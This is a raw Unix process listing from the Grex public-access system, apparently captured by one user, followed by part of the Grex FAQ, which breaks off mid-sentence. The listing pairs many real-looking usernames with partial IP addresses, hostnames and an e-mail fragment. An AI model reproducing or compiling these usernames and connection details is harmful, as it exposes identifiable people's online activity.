      root       102  0.0  0.0   60    0 ?  IW   Oct 10  0:01 rpc.statd
      daemon      62  0.0  0.0   56  112 ?  S    Oct 10 17:50 /usr/local/libexec/portm
      root     11493  0.0  0.0   56    0 ?  IW   18:10   0:02 telnetd ttyua 139.92.170
      root     10374  0.0  0.0   56   60 ?  S    18:02   0:19 telnetd ttyu1 204.212.46
      root       111  0.0  0.0  100    0 ?  IW   Oct 10103:12 /usr/local/sbin/idled
      root       113  0.0  0.0   24    0 ?  IW   Oct 10  0:00 /bin/sh /usr/local/Hughe
      root       105  0.0  0.2  140  448 ?  S    Oct 10 13:12 /usr/local/libexec/httpd
      hrcfan   11774  0.0  0.0  264    0 t2 IW   12:03   0:02 -tcsh (tcsh)
      root     13257  0.0  0.2  316  560 ?  S    18:20   0:00 sendmail: SAA13245 tilma
      root      1439  0.0  0.0   40    0 co IW   Oct 14  0:00 - std.9600 console (gett
      root     12376  0.0  0.2   56  436 ?  S    18:16   0:08 telnetd ttyr0 204.212.46
      cfadm    11371  0.0  0.0   96    0 q8 IW   18:09   0:02 /usr/local/bin/bbs
      msql       127  0.0  0.0  140    0 ?  IW   Oct 10276:15 /usr/local/Hughes/bin/ms
      root      3932  0.0  0.0   56    0 ?  IW   17:12   0:07 telnetd ttyr9 148.233.86
      janko     6567  0.0  0.2  144  504 r1 S    17:31   0:03 -bash (bash)
      root     12330  0.0  0.0  252    0 ?  IW   18:16   0:00 sendmail: server webpers
      root        84  0.0  5.01223212424 ?  S    Oct 10251:18 /usr/local/libexec/named
      richard  10202  0.0  0.0   36   56 pe S    18:01   0:00 watch ...
      root        71  0.0  0.0   36   52 ?  S    Oct 10  4:22 in.routed
      msql       126  0.0  0.0   52    0 ?  IW   Oct 10  0:00 /bin/csh -c /usr/local/H
      cfadm     2686  0.0  0.0  128    0 pe IW   17:02   0:06 /usr/local/bin/bbs
      root     11820  0.0  0.0  240    0 ?  IW   18:12   0:05 /usr/local/libexec/sshd
      ryan     12429  0.0  0.0  160    0 q5 IW   18:16   0:00 tcsh -c /a/r/y/ryan/pfil
      thea     10449  0.0  0.1 1264  300 u1 S    18:02   0:18 pine
      root       164  0.0  0.1   52  168 ?  S    Oct 10  8:06 cron
      root       219  0.0  0.0   40    0 b  IW   Oct 10  0:00 - std.9600 ttyb (getty)
      suchit     360  0.0  0.0  152    0 pa IW   16:43   0:07 -bash (bash)
      fb2      13125  0.0  0.0   36    0 ua IW   18:20   0:00 /bin/sh /b
      root     29495  0.0  0.0   40    0 ?  IW   06:01   0:00 in.ntalkd
      nobody   10684  0.0  0.3  216  628 ?  S    18:04   0:09 /usr/local/libexec/httpd
      root         2  0.0  0.0    0    0 ?  D    Oct 10  1:06 pagedaemon
      root     12583  0.0  0.2  328  524 ?  S    18:17   0:02 sendmail: RAA04763 serve
      mystar   28951  0.0  0.0   68    0 tf IW   16:31   0:02 -csh (csh)
      joe      13260  0.0  0.1   48  128 t8 S    18:20   0:00 /bin/sh /usr/local/bin/m
      root         1  0.0  0.0   52   20 ?  S    Oct 10  5:23 /sbin/init -
      root     11752  0.0  0.0   56    0 ?  IW   12:03   0:17 telnetd ttyt2 130.126.16
      mbollman 11691  0.0  0.0   72    0 p7 IW   18:12   0:01 -ksh (ksh)
      skymoon  10789  0.0  0.0   68    0 s8 IW   18:04   0:02 -csh (csh)
      root      2089  0.0  0.0   56    0 ?  IW   16:59   0:34 telnetd ttyu9 164.76.51.
      metgod   11225  0.0  0.0   68    0 t9 IW   18:07   0:01 ksh
      mikeaa   13340  0.0  0.0   72  112 t1 S    18:21   0:00 /bin/sh ./configure
      ya       10199  0.0  0.0   68    0 tc IW   18:01   0:02 -csh (csh)
      hrcfan   11415  0.0  0.0  184    0 t2 IW   18:09   0:01 elm
      root     10939  0.0  0.0   56   56 ?  S    18:05   0:09 telnetd ttyqd 198.182.64
      party    11972  0.0  0.1   72  328 t3 S    18:14   0:02 /usr/local/bin/party_
      root     28089  0.0  0.0   56    0 ?  IW   16:25   0:03 telnetd ttyte gate1.lci.
      jiffer   26209  0.0  0.0  264    0 r3 IW   16:12   0:02 -tcsh (tcsh)
      jackal   10326  0.0  0.0   48    0 rc TW   18:01   0:00 /bin/sh /usr/local/bin/m
      root     13199  0.0  0.2   56  436 ?  S    18:20   0:01 telnetd ttyt8 152.207.13
      root     28934  0.0  0.0   56   60 ?  S    16:31   0:13 telnetd ttytf 207.220.20
      meme      9643  0.0  0.0   68    0 tb IW   17:56   0:01 -csh (csh)
      nats      7089  0.0  0.0  172    0 q7 IW   17:35   0:01 elm
      root     10914  0.0  0.0   56   60 ?  S    18:05   0:06 telnetd ttypc 207.91.203
      root     13344  0.0  0.1  252  280 ?  S    18:21   0:00 sendmail: server tfabbs.
      root     11314  0.0  0.0   56    0 ?  IW   18:08   0:02 telnetd ttys4 24.48.58.2
      jackal   12828  0.0  0.0   36    0 rc TW   18:18   0:00 more -d
      root     10542  0.0  0.0   56    0 ?  IW   18:03   0:03 telnetd ttyq2 204.212.46
      root      7495  0.0  0.0   24    0 ?  IW   Oct 11  1:14 ./mdaemon -d
      root     11216  0.0  0.0   56    0 ?  IW   18:07   0:01 telnetd ttyt9 216.101.22
      archer    4089  0.0  0.0   48    0 r9 IW   17:13   0:00 /bin/sh /usr/local/bin/m
      root     11466  0.0  0.0   96    0 ?  IW   Oct 16  0:01 egrep USER|STOR|RETR|LIS
      root     22696  0.0  0.0   56    0 ?  IW   Oct 14  1:35 telnetd ttyu5 141.211.16
      root     11113  0.0  0.0   56    0 ?  IW   18:06   0:02 telnetd ttys0 198.108.22
      root     12296  0.0  0.0   56   60 ?  S    18:16   0:02 telnetd ttyq5 4.17.192.3
      robnoiz  11194  0.0  0.0  316    0 s0 IW   18:07   0:01 pine
      sekharg  10067  0.0  0.0   68    0 qb IW   17:59   0:01 -csh (csh)
      pfv      10343  0.0  0.0   36   56 u2 S    18:01   0:00 watch ...
      prime    11619  0.0  0.0   56    0 pc IW   18:11   0:01 -csh (csh)
      jazz       131  0.0  0.0  232    0 r2 IW   16:40   0:01 -tcsh (tcsh)
      pizo56   13130  0.0  0.2  800  516 ?  S    18:20   0:02 ftpd: quincy-ip-15-99.dy
      root      9885  0.0  0.0   56   60 ?  S    17:58   0:06 telnetd ttysa 198.182.64
      root     13275  0.0  0.2  300  388 ?  I    18:20   0:00 sendmail: SAA13263 f298.
      bebbe346 10528  0.0  0.0   48    0 t4 TW   18:02   0:00 mail pine
      nobody   11637  0.0  0.3  216  644 ?  S    18:11   0:04 /usr/local/libexec/httpd
      party     8477  0.0  0.1   72  328 t5 S    17:45   0:04 /usr/local/bin/party_
      root     11465  0.0  0.1   36  140 ?  S    Oct 16 14:41 tail -f /var/log/ftp.log
      wild     10942  0.0  0.0   40    0 qd IW   18:05   0:00 /bin/sh /b
      coop     16853  0.0  0.0  156    0 p4 IW   Oct 17  0:01 -bash (bash)
      saloon   10241  0.0  0.0  148    0 u0 IW   18:01   0:06 -bash (bash)
      root      2308  0.0  0.0   56    0 ?  IW   Oct 18  0:03 telnetd ttyp6 206.189.24
      root     14496  0.0  0.1   28  180 ?  S    12:25   0:12 in.comsat
      root     11920  0.0  0.0   56   60 ?  S    18:13   0:05 telnetd ttyt3 204.212.46
      root      9629  0.0  0.0   56   60 ?  S    17:55   0:16 telnetd ttytb 171.64.15.
      senna    29517  0.0  0.0   36    0 ue IW   16:36   0:02 watch ...
      root      6538  0.0  0.0   56   60 ?  S    17:31   0:07 telnetd ttyr1 158.193.82
      cfadm    11132  0.0  0.0   96    0 s0 IW   18:07   0:01 /usr/local/bin/bbs
      cfadm    11978  0.0  0.0  128    0 u5 IW   Oct 17  0:51 bbs staff
      wild     10963  0.0  0.0   48    0 qd IW   18:06   0:00 /bin/sh /usr/local/bin/m
      jackal   13021  0.0  0.0   40    0 rc IW   18:19   0:00 /bin/sh /usr/local/lib/m
      wasf     12094  0.0  0.0   68    0 q6 IW   18:15   0:01 -csh (csh)
      archer    3951  0.0  0.0   68    0 r9 IW   17:12   0:01 -csh (csh)
      root     12506  0.0  0.0   56    0 ?  IW   18:17   0:02 telnetd ttyu8 198.133.22
      jackal   13077  0.0  0.1   36  200 rc S    18:19   0:01 more -d
      root     10170  0.0  0.0   56    0 ?  IW   18:00   0:04 telnetd ttytc 163.121.88
      meme      9670  0.0  0.2  680  388 tb S    17:56   0:13 pine
      senna    29426  0.0  0.0   68    0 ue IW   16:35   0:01 -csh (csh)
      pfv      10305  0.0  0.0  260    0 u2 IW   18:01   0:02 -tcsh (tcsh)
      somesh   11383  0.0  0.0  380    0 s4 IW   18:09   0:01 lynx -cookies quote.yaho
      root     11906  0.0  0.0   56    0 ?  IW   18:13   0:05 telnetd ttysb 63.23.174.
      somesh   11322  0.0  0.0  264    0 s4 IW   18:08   0:01 -tcsh (tcsh)
      nobody   11899  0.0  0.3  216  664 ?  S    18:13   0:01 /usr/local/libexec/httpd
      root     29405  0.0  0.0   56   60 ?  S    16:35   0:06 telnetd ttyue 3com1a94.r
      krj      25504  0.0  0.0   56    0 q1 IW   16:09   0:01 -csh (csh)
      jackal   12792  0.0  0.0   40    0 rc TW   18:18   0:00 /bin/sh /usr/local/lib/m
      roelof   11869  0.0  0.0  264    0 p5 IW   18:13   0:03 -tcsh (tcsh)
      jackal   12830  0.0  0.0 1104    0 rc TW   18:18   0:00 sort
      root      8362  0.0  0.0   56   56 ?  S    17:44   0:04 telnetd ttyt5 202.56.224
      root     10766  0.0  0.0   56    0 ?  IW   18:04   0:04 telnetd ttys8 196.3.65.9
      nes16    10550  0.0  0.0   68    0 q2 IW   18:03   0:00 -csh (csh)
      root      7216  0.0  0.0   36  100 ?  S    20:57   3:02 tail -f /var/log/ftp.log
      root     12079  0.0  0.0   56   60 ?  S    18:14   0:03 telnetd ttyq6 front0.cpl
      tlaff    11081  0.0  0.0   40    0 td IW   18:06   0:00 /bin/sh /usr/local/lib/m
      nobody   10600  0.0  0.3  216  696 ?  S    18:03   0:05 /usr/local/libexec/httpd
      tlaff    11061  0.0  0.0   48    0 td IW   18:06   0:00 /bin/sh /usr/local/bin/m
      nobody    8285  0.0  0.0   32    0 ?  IW   Oct 11  0:01 fingerd
      root     25480  0.0  0.0   56   56 ?  S    16:08   0:46 telnetd ttyq1 35.8.1.4
      root     11004  0.0  0.0   56    0 ?  IW   18:06   0:03 telnetd ttys9 200.16.7.1
      nobody   11876  0.0  0.3  216  724 ?  S    18:13   0:05 /usr/local/libexec/httpd
      nes16    10580  0.0  0.0   48    0 q2 IW   18:03   0:00 /bin/sh /usr/local/bin/m
      abbagirl  2229  0.0  0.0   36    0 u9 IW   17:00   0:01 watch ...
      cfadm     3791  0.0  0.0  128    0 q1 IW   17:11   0:09 bbs
      jackal   13078  0.0  0.1   40  212 rc S    18:19   0:01 last
      archer    4105  0.0  0.0 1180    0 r9 IW   17:13   0:14 pine
      mauricio 11043  0.0  0.0   68    0 s9 IW   18:06   0:02 -csh (csh)
      root     10237  0.0  0.0   56   60 ?  S    18:01   0:11 telnetd ttyu0 137.224.19
      ryan     12439  0.0  0.1   44  268 q5 S    18:16   0:02 /a/r/y/ryan/pfilt/filter
      thea     10395  0.0  0.0   68    0 u1 IW   18:02   0:01 -csh (csh)
      mbollman 12350  0.0  0.0   28    0 p7 IW   18:16   0:00 /bin/sh /usr/local/bin/h
      mbollman 12551  0.0  0.0   40    0 p7 IW   18:17   0:00 more -d /usr/local/grexd
      root     26165  0.0  0.0   56   60 ?  S    16:12   0:18 telnetd ttyr3 165.215.30
      jackal   10254  0.0  0.0   68    0 rc IW   18:01   0:01 -csh (csh)
      joe      13308  0.0  0.5  252 1188 t8 S    18:20   0:00 pine
      jiffer   26334  0.0  0.0   36    0 r3 IW   16:13   0:02 watch ...
      root     10244  0.0  0.0   56   60 ?  S    18:01   0:10 telnetd ttyrc 206.10.105
      shrike   28123  0.0  0.0  272    0 te IW   16:25   0:02 -tcsh (tcsh)
      jopap     9888  0.0  0.0   68    0 sa IW   17:58   0:02 -csh (csh)
      menuadm  11948  0.0  0.0   60   88 u0 S    18:13   0:03 talk prime
      keesan   12650  0.0  0.0   68    0 qe IW   18:17   0:02 -csh (csh)
      krj      25547  0.0  0.0   36    0 q1 IW   16:09   0:02 watch ...
      root      3679  0.0  0.0  144    0 ?  IW   Oct 14 37:59 /usr/local/libexec/sshd
      greg99   12558  0.0  0.0  156    0 u8 IW   18:17   0:02 -bash (bash)
      jackal   12829  0.0  0.0  328    0 rc TW   18:18   0:30 ps -aux
      party    29735  0.0  0.0   80  104 ue S    16:38   0:07 /usr/local/bin/party_
      tadeu    16231  0.0  0.0  796    0 ?  IW   12:39   0:01 ftpd: 200.249.132.149: t
      root     13305  0.0  0.1  252  208 ?  S    18:20   0:00 sendmail: startup with l
      root      8487  0.0  0.0   56    0 ?  IW   17:45   0:04 telnetd ttyt4 202.60.130
      jackal   12987  0.0  0.0   48    0 rc IW   18:19   0:00 /bin/sh /usr/local/bin/m
      cfadm    12155  0.0  0.0   96    0 qd IW   18:15   0:01 bbs
      party    11136  0.0  0.1   72  140 td S    18:07   0:02 /usr/local/bin/party_
      rjh123   11441  0.0  0.0  428  124 q8 IW   18:09   0:07 pine
      root     10897  0.0  0.0   56   56 ?  S    18:05   0:08 telnetd ttyt1 209.138.42
      root      2642  0.0  0.0   56   56 ?  S    17:02   0:17 telnetd ttype 161.233.38
      vetri     7729  0.0  0.1   80  160 q3 S    17:39   0:03 -csh (csh)
      party    10050  0.0  0.0   60  104 pe S    17:59   0:04 /usr/local/bin/party_
      mikeaa   12286  0.0  0.1   72  156 t1 S    18:16   0:07 /bin/sh ./configure
      shooter   4464  0.0  0.0  800    0 ?  IW   14:53   0:03 ftpd: 212.49.231.161: sh
      mooncat  11921  0.0  0.0   68    0 t3 IW   18:13   0:01 -csh (csh)
      cfadm    11016  0.0  0.0   96    0 td IW   18:06   0:01 /usr/local/bin/bbs
      pfv      10369  0.0  0.1   52  200 u2 S    18:02   0:07 /a/p/f/pfv/bin/pfilt
      root     16844  0.0  0.0  496    0 ?  IW   Oct 17  1:23 /usr/local/libexec/sshd
      mdw      22714  0.0  0.0   76    0 u5 IW   Oct 14  0:06 -csh (csh)
      bebbe346  8506  0.0  0.0   68    0 t4 IW   17:45   0:01 -csh (csh)
      pinhead  12766  0.0  0.0  796    0 ?  IW   18:18   0:02 ftpd: a03169.sp.mandic.c
      root     29798  0.0  0.0   40    0 ?  IW   06:03   0:00 in.ntalkd
      shrike    2942  0.0  0.0  224    0 te IW   17:05   0:03 elm
      somesh   11379  0.0  0.0   28    0 s4 IW   18:09   0:00 /bin/sh ./q
      party     7116  0.0  0.1   60  320 q1 S    17:35   0:07 /usr/local/bin/party_
      root     12718  0.0  0.0   56    0 ?  IW   12:08   0:35 telnetd ttyq7 edsel.smud
      root     15158  0.0  0.0   56    0 ?  IW   12:30   0:43 telnetd ttyq0 inet.bdsi.
      root     11000  0.0  0.2   56  436 ?  S    18:06   0:05 telnetd ttytd 128.196.22
      thea     10435  0.0  0.0   48    0 u1 IW   18:02   0:00 /bin/sh /usr/local/bin/m
      root       134  0.0  0.0   56    0 ?  IW   16:40   0:49 telnetd ttypa 129.115.11
      sys      10314  0.0  0.0   36   44 ?  I    11:54   0:09 in.identd -w -t300 -l
      ryan     12424  0.0  0.1   36  152 q5 S    18:16   0:00 /a/r/y/ryan/watch ...
      root      2470  0.0  0.0   68    0 u5 TW   Oct 17  0:02 -sh (csh)
      sys      26321  0.0  0.0   48    0 ?  IW   Oct 11  0:00 in.identd -w -t300 -l
      mikeaa   10916  0.0  0.0  156    0 t1 IW   18:05   0:03 -bash (bash)
      root     26487  0.0  0.0   56   60 ?  S    19:26   1:47 inetd
      neya     15160  0.0  0.0   72    0 q0 IW   12:30   0:06 -csh (csh)
      root       120  0.0  0.0   56   56 ?  R    16:40  40:18 telnetd ttyr2 147.225.19
      krj      25545  0.0  0.0   36    0 q1 IW   16:09   0:03 watch ...
      root     13219  0.0  0.2   56  432 ?  S    18:20   0:01 telnetd ttys3 24.112.155
      sj2       8398  0.0  0.0  144    0 t5 IW   17:45   0:01 -bash (bash)
      keesan   12720  0.0  0.0   48   60 qe S    18:18   0:00 mail wlevak
      nes16    10616  0.0  0.0  448    0 q2 IW   18:03   0:02 pine
      root     10058  0.0  0.0   56    0 ?  IW   17:59   0:02 telnetd ttyqb 24.30.48.8
      nats     12725  0.0  0.0   68    0 q7 IW   12:08   0:05 -csh (csh)
      abbagirl  2171  0.0  0.0   64    0 u9 IW   16:59   0:02 -csh (csh)
      party    26762  0.0  0.1   80  208 r3 S    16:16   0:11 /usr/local/bin/party_
      party    12225  0.0  0.1   72  180 qd S    18:15   0:01 /usr/local/bin/party_
      root     10287  0.0  0.0   56   60 ?  S    18:01   0:10 telnetd ttyu2 216.93.16.
      ryan     12318  0.0  0.0   68    0 q5 IW   18:16   0:01 -csh (csh)
      root     12644  0.0  0.0   56   60 ?  S    18:17   0:07 telnetd ttyqe 204.212.46
      jopap    13073  0.0  0.4  552  876 sa S    18:19   0:01 pico.real -z all
      root     13324  0.0  0.1  124  264 r0 S    18:21   0:00 login -h 204.212.46.132
      menuadm  11776  0.0  0.0   60   96 pc S    18:12   0:02 talk saloon
      wasf     12131  0.0  0.0   48    0 q6 IW   18:15   0:00 /bin/sh /usr/local/bin/m
      root      9139  0.0  0.3  480  668 ?  S    17:51   0:17 sendmail: HAA21168 hcldl
      wasf     12185  0.0  0.3  460  620 q6 S    18:15   0:03 pine
      pfv      10360  0.0  0.0  192    0 u2 IW   18:02   0:01 tcsh -c ~pfv/bin/pfilt
      party    12426  0.0  0.1   80  336 q5 S    18:16   0:01 eggdrop
      root     10736  0.0  0.0  396    0 ?  IW   18:04   0:10 sendmail: FAA18438 rings
      greg99   12719  0.0  0.0  348    0 u8 IW   18:18   0:01 lynx
      party    10347  0.0  0.0   80  112 u2 S    18:01   0:04 /usr/local/bin/party_ #p
      root     13154  0.0  0.0  120    0 sb IW   18:20   0:00 login -h 63.23.174.219 -
      root     11357  0.0  0.0   56   60 ?  IW   18:09   0:07 telnetd ttyq8 207.91.203
      root     13276  0.0  0.0   92  188 ?  IW   18:20   0:00 mail -r reenaf@hotmail.c
      root      7217  0.0  0.0   96  104 ?  IW   20:57   0:06 egrep USER|STOR|RETR|LIS
      nobody   11759  0.0  0.3  216  680 ?  S    18:12   0:01 /usr/local/libexec/httpd
      root     11668  0.0  0.0   56    0 ?  IW   18:11   0:01 telnetd ttyp7 152.171.23
      root         0  0.0  0.0    0    0 ?  D    Oct 10154:26 swapper
      mystar   12365  0.0  0.1  504  340 tf S    18:16   0:05 lynx sports.yahoo.com
      joe      13217  0.0  0.0   68    0 t8 IW   18:20   0:01 -csh (csh)
      nobody   11761  0.0  0.3  216  708 ?  S    18:12   0:03 /usr/local/libexec/httpd
      > faq
                     Frequently Asked Questions About Grex
       
      General
       
      * What is Grex?
       
      Grex is a public-access computer conferencing system in Ann Arbor, Michigan,
      USA. It is cooperatively owned and operated, and is
      supported entirely by donations from users. All staff members are volunteers.
       
      * What does the name "Grex" mean?
       
      Grex is not an acronym. It is a Latin word meaning "flock". It is the root of
      a number of familiar English words such as aggregate,
      congregate, and gregarious.
       
      * What can I do on this system?
       
      Grex provides all of the following services for free.
       
        o Electronic conferencing using "PicoSpan" or "Backtalk"
        o Internet e-mail using "mail", "elm", "pine" or "mh"
        o Browse the web in text mode using "lynx"
        o Access to usenet via "lynx" to the dejanews web site
        o Multichannel real-time chat using "party"
        o Free text-only web site hosting.
        o On-line games, including "Nethack"
        o Access to a Unix shell account, with all standard commands
        o Access to the C/C++ compiler, assembler, and other development tools
       
      However, Grex does not provide any of the following services at all:
       
        o Download areas
        o Mailing lists
        o Bots (for IRC or anything else)
        o Graphical web page hosting
        o A place to store files
       
      And there are a few things you can only do if you are a member (who has made a
      donation and sent ID). These are
       
        o Vote in Grex elections.
        o Serve on the board of Cyberspace Communications.
        o Access telnet, ftp, and irc sites from Grex.
        o Access web sites running on unusual ports, via lynx from Grex.
       
      * What operating system is Grex running?
       
      Grex is running SunOS 4.1.4 on a Sun 4/670 MP with dual processors. It is not
      Linux, but it is Unix, so in many ways it is similar to
      Linux. There are a lot of details about Grex's configuration available in the
      Grex staff notes on the web.
      http://www.cyberspace.org/staffnote/ Follow the link to Grex's Hardware and
      software.
       
      ----------------------------------------------------------------------------
       
      Conferencing
       
      * What is "computer conferencing?"
       
      A computer conference is an area set aside for discussion on some general
      topic, such as computers, politics, or gardening. In such
      an area, people can read what other people have posted, and can introduce new
      subtopics or add responses to existing ones. On
      many systems, conferences are called "forums". Grex has many conferences. For
      a complete list, see
      http://cyberspace.org/cgi-bin/bt/pistachio/conflist.
       
      * How can I participate in Grex's conferences?
       
      Grex's conferences are accessible by a text-based terminal interface or by the
      World Wide Web. To access the text-based interface,
      either dial direct or telnet to Grex and run the "bbs" command. (This command
      is run automatically every time you log in if you
      choose the "bbs shell" when you create your account.) World Wide Web access is
      provided by Grex's "Backtalk" conferencing
      software. Please see http://cyberspace.org/backtalk.html for details on using
      Backtalk.
       
      ----------------------------------------------------------------------------
       
      Governance
       
      * How is Grex governed?
       
      Cyberspace Communications functions as an online democracy, with policies set
      by its users. The Co-op Conference is open to all
      users and provides a forum for discussing policy issues. The Board of
      Directors, elected by the members, is the formal governing
      body and uses consensus in the Co-op Conference as its primary guide for
      making decisions. Any member of Grex who can attend
      the monthly meetings, held in Ann Arbor, Michigan, is eligible to run for the
      Board of Directors. In addition, any member can call a
      binding vote by the membership on any policy issue. The Articles of
      Incorporation and Bylaws can be viewed online.
       
      * How can I participate in Grex governance?
       
      Any user can have a voice in Grex governance by joining the Co-op conference
      and participating in the discussions there. If you
      wish to be eligible to vote in Grex elections and to run for the Board of
      Directors, you can become a Grex member. Membership
      dues are US$6/month or US$60/year. To find out how to make membership
      payments, please see
      http://cyberspace.org/member.html. Membership donations are Grex's primary
      source of financing.
       
      * Can I pay for membership by credit card?
       
      Unfortunately, no. Grex has investigated the possibility of accepting
      memberships by credit card, but the setup cost and monthly
      charges that we would have to pay to the bank are too high for us to pay. We
      do accept personal checks in US funds drawn on a US
      bank, US currency (not recommended to send by mail), and international money
      orders.
       
      ----------------------------------------------------------------------------
       
      How do I ... ?
       
      * How do I change my name, my shell, my mail forwarding, my password, or my
      terminal type?
       
      You can change any of these properties of your account with the "change"
      command. If you are using a menu or if you are at a bbs
      (Ok) prompt, type "!change" If you are in lynx, type "!" (an exclamation
      point) to get to a shell prompt first. At a shell prompt, type
      "change" and follow the menu-based instructions.
       
      * How do I change my login ID?
       
      You can't change it. Instead, you have to create a new account with the login
      ID that you wish. Once you have done that, you can
      copy the files that you need from your old account to your new one. When you
      no longer need your old account, you can ask to have
      it deleted by sending a request from your old account to staff@cyberspace.org.
       
      * How do I set up a web page?
       
      There is a completely separate FAQ for all questions related to the Grex web
      server. Please see
      http://www.cyberspace.org/local/grex/wwwfaq.html.
       
      * How do I run irc?
       
      Unless you are a paying member, you can't use IRC because the protocol is
      blocked for free accounts. For more detailed
      information about this, see the Grex Eggdrop Page from the Grex Staff Notes.
       
      If you are a guest user, you cannot access IRC. You can chat on-line within
      the Grex community by using "party" (see chatting,
      below). Paying members just need to type "irc" to run the ircii client
      program, which is installed for this purpose.
       
      * How do I chat with others?
       
      Grex has six ways of chatting:
       
        o 'party' is a chat program that many people can run at once.
        o 'write' sends text to the other person's screen one line at a time.
        o 'chat' is like 'write' but it sends one character at a time.
        o 'tel' is like 'write' but it sends only one line and then stops.
        o 'talk' splits the screen in half, so both people can type at once.
        o 'ytalk' is like talk but can accommodate more than two people.
       
      * How do I find out who is waiting to log in?
       
      You can't find which accounts are waiting. People don't log in until after
      they get out of the telnet queue, so the system doesn't
      actually know who the people in the queue are.
       
      You can get some amount of information about who is in the queue. The command:
       
          fixwait -l
       
      will give you a list of the IP addresses that people on Grex are coming from,
      including people in the queue. If your friend has a
      unique IP address, you may be able to recognize it in the list.
       
      * How do I get out of vi?
       
      vi (pronounced vee-eye) is a powerful text editor, but it has a steep learning
      curve at first. You can usually tell that you are in vi
      when you have a vertical line of squiggles (tildes) on the left of your
      screen. If you are trapped in vi, remember to type the escape
      key and then :q! (colon-q-exclamation point) followed by a return. The pico
      editor is a much friendlier editor for less experienced
      users.
       
      * How do I access Usenet news?
       
      Grex does not maintain its own base of Usenet news, because this requires too
      much space and too much of our internet link. So
      there is no usenet client program on Grex. However, you can access Usenet via
      the "lynx" web browser. Just connect to
      http://dejanews.com/.
       
      * How do I run X-windows?
       
      Grex does not support graphical interfaces such as X-windows. This service
      requires many more resources than the text-based
      service that Grex provides. It would use far too much CPU time and bandwidth
      for Grex to be able to support it.
       
      * How do I restore a lost file from a backup tape?
       
      We can't do that. We just don't have time. Grex makes regular backups onto
      tape, but this is an enormously time consuming
      process. The purpose of these backup tapes is to protect the system from
      disaster. Unfortunately, there is not enough time to honor
      requests from individual users to restore files from these tapes. Grex is not
      a good place to keep any file that you cannot afford to
      lose. If you have an important file on Grex, it is your responsibility to keep
      a backup of it on your own computer.
       
      * How do I get a list of Unix commands?
       
      There are so many Unix commands that we recommend that users who are not
      familiar with Unix use the "menu" command to
      explore Grex. The most common commands are available there. If you really want
      a list, then run the Grex command
      "listcommands" to print a list of most Unix commands on Grex. (Built-in shell
      commands are not included). This will take a long time
      to run.
       
      * How do I use Unix commands?
       
      The Unix operating system is amazingly powerful and flexible, with thousands
      of commands. Unix can be a challenge to get started
      with, but if you are interested in learning Unix, Grex is a good place to
      start, since we do give you access to almost all commands.
      For a good introduction to basic Unix and VI usage, see Christopher Taylor's
      witty tutorial Unix is a Four Letter Word, or the
      University of Edinburgh's UNIXhelp for Users pages. Jennifer Myers has a good
      page of Unix links at the UNIX Reference Desk.
       
      Online reference information about most commands can be called up via the
      "man" command. For example, for information about
      the date command, type
       
          man date
       
      ----------------------------------------------------------------------------
       
      Accounts and Passwords
       
      * Why do numbers appear before the login prompt?
       
      If you are telnetting to Grex when it is full, you must wait in a queue for a
      free port to telnet into. These numbers are telling you your
      place in line. There usually is no queue in the evenings in the eastern US and
      on weekends.
       
      * Why do I get a login prompt after I log out?
       
      This is in case there is a queue. it permits you to log in without waiting
      through the queue a second time. It is safe to disconnect
      when you are at the login prompt, or you can type "bye" or "exit" and Grex
      will disconnect.
       
      * Why does it say my new password is too obvious?
       
      Probably because it is too short, or only has lower case letters. It is
      important that internet vandals not be able to guess your
      password. Therefore, the Grex password change program is very particular about
      what it will accept. It is a good idea for your
      password to have at least 9 characters, at least one of which is an upper case
      letter, and at least one number or punctuation
      character embedded in it. Try the "genpass" program for some random passwords.
       
      * Why does it say my password is expiring?
       
      For security reasons, you should not keep the same password for too long. Grex
      passwords expire when they have not been
      changed for a whole year. All you have to do is run the "change" program to
      change your password, and you will stop getting
      nagged when you log in. Please remember to write your new password down when
      you change it, so you won't forget it.
       
      * Grex said, "3 failures since last login," when I logged in. What does this
      mean?
       
      When someone tries to log in to your account but does not know the password,
      Grex keeps count of failed login attempts. In general
      if there are only two or three of them, it probably means someone made a typo
      at the login prompt. This happens most often for
      accounts with very short user IDs and those with popular names, such as "ken".
      Less commonly, login failures may occur when
      someone runs telnet with the option to pass along the account name from
      another system. If it is a different account name, but
      matches yours, this will produce a failed login attempt for your account every
      time this person telnets to Grex.
       
      If there are 25 or 30 failed login attempts, or if the last successful login
      to your account wasn't yours, then it could mean that
      someone is trying to break in to your account. In general, most failed login
      attempts are from other people's typing errors and are not
      malicious. If you still suspect malicious activity, change your password
      (don't forget to write it down) and let the staff know so that
      they can investigate.
       
      * I can't remember my password. What do I do?
       
      Contact the Grex staff. Send mail from another site if you have access to
      email at another site. Send messages about access
      problems to staff@cyberspace.org. Remember to specify which account is the one
      you lost the password for.
       
      You can also log in to Grex as "trouble" without a password, which will send a
      message to the staff. Be sure to provide a postal
      address, an e-mail address, or a local telephone number, so that the staff can
      contact you in return.
       
      * I have a Grex account. Why do I get "No such loginid?"
       
      This means that your account has been deleted. Accounts on Grex are deleted if
      no one logs in for more than 3 months. There is not
      enough room on Grex to keep old unused accounts. To avoid losing your account,
      you should log in every month or two. Accessing
      your web page, or having your mail get forwarded does not count, but
      conferencing over the web using your account and password
      in Backtalk does count as logging in for this purpose.
       
      If your account has been deleted, it usually cannot be recovered or restored.
      Please feel free to recreate the account.
       
      * I don't want to use my account anymore. How do I get it deleted?
       
      If you don't want to wait until your account expires, you have to log in one
      last time and send a message to staff@cyberspace.org
      from the account that you want deleted. In your message, ask for it to be
      deleted.
       
      * Why can't I enter control-C when I am creating my account?
       
      When creating an account by telnet, you are asked to provide the characters
      you wish to use for various purposes. People using
      Macintosh NCSA Telnet have experienced the behavior that when they type ^C,
      the program exits rather than accepting the ^C as
      the designated control character.
       
      This is caused by undesirable preferences within that program and is easy to
      fix. Look at the "Session" menu, at the "Setup Keys"
      menu item (or hit command-S). You will probably find that you have a setting
      for "interrupt process" which is set to ^C. If so, NCSA
      Telnet is honoring this setting and sending the "interrupt process" signal
      (part of the time-worn telnet protocol) whenever you type
      ^C. Blank this setting out and then save your telnet set in a file. If you
      start telnetting by double clicking on the saved settings, you
      won't have to remember to clear it each time.
       
      ----------------------------------------------------------------------------
       
      E-Mail
       
      * How do I get Grex to forward my mail to another site?
       
      Use the "change" command. Just type "change" at a shell prompt or "!change" at
      any other prompt. This will invoke a menu that
      allows you to change almost any setting on your account, including the mail
      forwarding option. There are certain restrictions on the
      use of forwarding, so make sure you are following the rules..
       
      * I set up .forward myself. Why doesn't it work?
       
      Probably because it is not world readable. .forward files must be world
      readable in order to be valid on Grex. If you are looking for a
      way to forward your mail to an anonymous place, you need to find an anonymous
      remailer system. Grex doesn't do this. To make
